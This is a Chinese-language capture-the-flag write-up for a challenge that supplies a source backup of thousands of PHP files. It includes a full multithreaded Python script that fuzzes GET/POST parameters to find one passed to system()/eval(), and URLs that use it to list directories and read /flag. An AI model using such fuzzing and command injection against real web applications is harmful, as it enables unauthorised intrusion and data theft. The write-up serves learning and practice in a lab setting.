前言:
对于我来说这题确实也有些难度了。做题过程也是困难重重呀,废话不多说进入正题吧!
0X01 解题思路
- 打开题目链接,提示留了源码备份为www.tar.gz。那么我们就下载看看。
- 打开压缩包发现有3000多个php文件,试着打开几个php文件,发现代码中存在一些诸如这样的get或post参数会执行system()/eval()/assert()函数,意味着我们可以通过传递参数的方式来执行cmd命令。
![]()
- 由于文件太多,于是我们在本地搭建环境(将解压的文件夹放进网站根目录),我使用的是phpstudy,我将解压的src放在了D:\phpstudy\WWW\src我的网站根目录。然后我们使用python脚本来爆破。
- 经过参考大佬们的脚本以及自己的理解,以下就是我做题时的脚本:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59import os
import requests
import re #引入正则
import threading #用于多线程
import time
print('开始时间: '+ time.asctime( time.localtime(time.time()) )) #格式化输出,开始时间
s1=threading.Semaphore(100)
#Semaphore 管理一个计数器,每调用一次 acquire() 方法,计数器就减一,每调用一次 release() 方法,计数器就加一。计时器的值默认为 1
#计数器的值不能小于 0,当计数器的值为 0 时,调用 acquire() 的线程就会等待,直到 release() 被调用。
#因此,可以利用这个特性来控制线程数量。
filePath = r"D:/phpstudy/WWW/src/" #改变当前的路径
os.chdir(filePath) #改变当前工作目录到指定的路径。
requests.adapters.DEFAULT_RETRIES = 5 #设置重连次数,防止线程数过高,断开连接
#requests请求发送的次数太多的情况下会报错(max ......)解决办法就是13和17行
files = os.listdir(filePath) #读取当前路径下的所有文件名
session = requests.Session()
session.keep_alive = False # 设置连接活跃状态为False
def get_content(file):
s1.acquire() #线程加锁
print('trying '+file)
with open(file,encoding='utf-8') as f: #打开php文件,提取所有的$_GET和$_POST的参数
gets = list(re.findall('\$_GET\[\'(.*?)\'\]', f.read())) #从f.read()中匹配get需要传值的名称
posts = list(re.findall('\$_POST\[\'(.*?)\'\]', f.read()))
data = {} #所有的$_POST
params = {} #所有的$_GET
for m in gets:
params[m] = "echo 'mayi077';"
for n in posts:
data[n] = "echo 'mayi077';"
url = 'http://127.0.0.1/src/'+file
req = session.post(url, data=data, params=params) #一次性请求所有的GET和POST
req.encoding = 'utf-8'
content = req.text
req.close() # 关闭请求 释放内存 切记打开就得关呀
if "mayi077" in content: #如果发现有可以利用的参数,继续筛选出具体的参数
flag = 0
for a in gets:
req = session.get(url, params={a:"echo 'mayi077';"})
content = req.text
req.close() # 关闭请求 释放内存 切记打开就得关呀
if "mayi077" in content:
flag = 1
print('找到了利用文件: '+file+" and 找到了利用的参数:%s 且是get请求" %a)
print('结束时间: ' + time.asctime(time.localtime(time.time()))+"\n\n\n\n")
break
if flag != 1:
for b in posts:
req = session.post(url, data={b:"echo 'mayi077';"})
content = req.text
req.close() # 关闭请求 释放内存切记打开就得关呀
if "mayi077" in content:
print('找到了利用文件: '+file+" and 找到了利用的参数:%s 且是post请求 " %b)
print('结束时间: ' + time.asctime(time.localtime(time.time()))+"\n\n\n\n")
break
s1.release() #线程解锁
for i in files: #加入多线程
t = threading.Thread(target=get_content, args=(i,)) #注意target=函数,args=(传的值, ) args需要是一个元组
t.start() # 开始 - 跑出来的结果如下:
![]()
- 我们尝试着访问: http://d0741499-ca48-4573-a0be-87e07aec30ef.node3.buuoj.cn/xk0SzyKwfzw.php?Efa5BVG=ls ../../../../ (至于为什么访问这个,其实也是经过试错的)得到根目录的文件及目录列表:
![]()
- 接着我们访问: http://d0741499-ca48-4573-a0be-87e07aec30ef.node3.buuoj.cn/xk0SzyKwfzw.php?Efa5BVG=cat%20/flag 得到flag:
![]()
0X02 自己在解题过程中所遇到的问题
- 在本地搭建好环境后浏览器访问文件报错无法理解?? (2个连续的问号),开始也不理解。后面百度了??,得知他是php7以上才有的,$a=$c??$b;等同于 $a=isset($c)?$c:$b; 。那么我们只要在phpstudy中将版本调到7.0以上,7.0以上需要v14,可自行安装。
- 脚本的编写,确实现在我还不能独立不参照别人的脚本给编写出来,我真是太菜了,加油努力呀!
